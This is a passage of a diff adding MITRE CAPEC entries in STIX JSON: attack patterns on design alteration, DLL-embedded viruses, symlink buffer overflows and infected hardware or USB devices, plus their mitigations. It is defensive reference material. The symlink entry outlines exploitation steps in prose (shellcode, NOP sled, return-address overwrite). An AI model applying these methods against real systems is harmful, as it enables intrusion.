"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3109571-f239-4195-af76-8ba87f02afce", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b041562-6f87-4aa3-94d2-6cc9b68a540f", + "spec_version": "2.1", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-447", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/447.html" + } + ], + "id": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Design Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e" + ], + "x_capec_prerequisites": [ + "Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.", + "Ability to forge web communications to deliver modified design documentation." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a78cd3b8-5b83-473a-a2b9-a4f2f8eb4a52", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "spec_version": "2.1", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification.", + "id": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54127afd-7b03-4cb6-b49b-ae02838e829c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "spec_version": "2.1", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.", + "external_references": [ + { + "external_id": "CAPEC-448", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/448.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + } + ], + "id": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Embed Virus into DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0abd6ec-3ef1-4bad-88ac-615c6674b4d5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-449", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/449.html" + } + ], + "id": "attack-pattern--3a127c86-c569-4de3-a328-1c1b45a9f986", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB Stick", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.", + "external_references": [ + { + "external_id": "CAPEC-45", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/45.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The EFTP server has a buffer overflow that can be exploited if an adversary uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the adversary uploads some content (the link file) and then the adversary causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program that might load in certain files to memory.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    The adversary creates or modifies a symbolic link pointing to those files which contain an excessive amount of data. If creating a symbolic link to one of those files causes different behavior in the application, then an injection vector has been identified.

  2. Craft overflow file content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the specially crafted file content, the adversary creates a symbolic link from the identified resource to the malicious file, causing a targeted buffer overflow attack.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary can create symbolic link on the target host.", + "The target host does not perform correct boundary checking while consuming data from a resources." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.", + "id": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ecde6069-c1c7-4e95-bfbf-8d888d1da15e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ae175d98-2ef9-4f9b-a6e5-bdcd283fca9d", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c08d081e-5bc2-4eeb-bef2-5280baed888e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pay attention to the resource pointed to by your symlink links (See attack pattern named \"Forced Symlink race\"), they can be replaced by malicious resources.", + "id": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d781109-18f4-4057-a1b2-2d53e821b317", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768e67b2-6609-4e58-b9e6-e321bd213b74", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Always check the size of the input data before copying to a buffer.", + "id": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7487759c-c682-45d9-b902-871361800f52", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c0f30c8-59bc-4ff2-91c7-ca8f4bd5d374", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9762e554-038f-4527-b000-3e8e0d78fe26", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ce42f28-5f2d-4b83-8daf-869c4145268e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--71106318-5e06-4db7-b209-bbf30b0020fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--84ae2ea4-df85-4853-b1f2-319992648876", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Embed Virus into DLL. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-450", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/450.html" + } + ], + "id": "attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via USB U3 Autorun", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-448 : Malware Infection into Product Software. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-451", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--64076ab3-d972-4688-b46b-76627923a8a0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Malware Propagation via Infected Peripheral Device", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-452", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/452.html" + } + ], + "id": "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--92df4967-ec90-4dc6-a8da-739892e850a4" + ], + "x_capec_prerequisites": [ + "Access to the hardware currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-453", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/453.html" + } + ], + "id": "attack-pattern--a2eaa5c4-8d21-414a-9d49-08667f4c6427", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-454", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/454.html" + } + ], + "id": "attack-pattern--c18bf62a-4419-4606-9dbe-03ab63873b60", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Modification of Existing Components with Counterfeit Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-457 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-455", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/455.html" + } + ], + "id": "attack-pattern--55c6c2d2-1850-4263-97eb-e47c9b9a7a4b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Malicious Logic Insertion via Inclusion of Counterfeit Hardware Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-456", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/456.html" + }, + { + "external_id": "CWE-1257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1257.html" + }, + { + "external_id": "CWE-1260", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1260.html" + }, + { + "external_id": "CWE-1274", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1274.html" + }, + { + "external_id": "CWE-1312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1312.html" + }, + { + "external_id": "CWE-1316", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1316.html" + } + ], + "id": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Memory", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.", + "In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8", + "attack-pattern--96c60498-fdd4-4f9f-a21f-c1a4ee84f0f3" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect stop operations with known virus.", + "id": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-456-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66815cc1-00b2-4e7e-b397-ae5fb384441e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--654febd1-834c-4c6b-b928-85c97bbf9150", + "spec_version": "2.1", + "target_ref": "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.", + "external_references": [ + { + "external_id": "CAPEC-457", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/457.html" + }, + { + "external_id": "CWE-1299", + "source_name": "cwe", + "url": 